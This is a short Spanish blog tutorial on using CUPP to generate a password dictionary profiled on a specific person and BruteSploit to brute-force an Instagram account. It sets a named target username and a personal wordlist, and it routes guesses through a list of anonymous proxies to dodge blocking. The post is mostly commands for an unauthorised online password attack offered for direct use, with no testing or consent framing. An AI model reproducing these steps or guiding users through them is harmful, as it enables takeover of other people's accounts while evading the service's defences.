Hola amigos.
Hoy vamos ver las herramientas cupp y
brutesploit.
Cupp es un script que nos va a ayudar a
crear un diccionario de conocimiento para después hacer fuerza
bruta.
Y en este caso, veremos cómo hacer
fuerza bruta con bruesploit.
Dos posts en uno.
En primer lugar, nos descargamos cupp,
lo podemos hacer por
apt-get install cupp
o a través de su repositorio en
github:
git clone
https://github.com/Mebus/cupp.git
Tendremos varias opciones
-i Inicia el modo interactivo.
-w Usa un diccionario ya existente.
-l Descarga diccionarios del
repositorio
-a Usa usuarios y contraseñas de
AlectoDB
El archivo cupp.cfg es el fichero de
configuración, en el que podemos cambiar las combinaciones de la
generación de diccionarios.
Ahora, instalaremos brutesploit
Nos metemos en el directorio
BruteSploit
cd BruteSploit
Asignamos permisos de ejecución
chmod +x Brutesploit
Ejecutamos
./Brutesploit
El programa va por módulos. Para
mostrarlos usaremos
show modules
Por ejemplo, vamos a realizar un ataque
para instagram:
list 0e
use 0e4
show options
Configuramos las distintas opciones con
set
set username manugomez1977
set wordlist /root/cupp/alfonso.txt
Para el proxy, abrimos en otra terminal
y ponemos
nano /root/proxys.txt
Y ponemos una lista de proxys en
formato
ip:port
Podéis encontrar listas de proxys
anonimos en https://hidemy.name/es
Guardaremos, cerraremos y, en la
terminal de BruteSploit
set proxy /root/proxys.txt
set threads 5
run
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.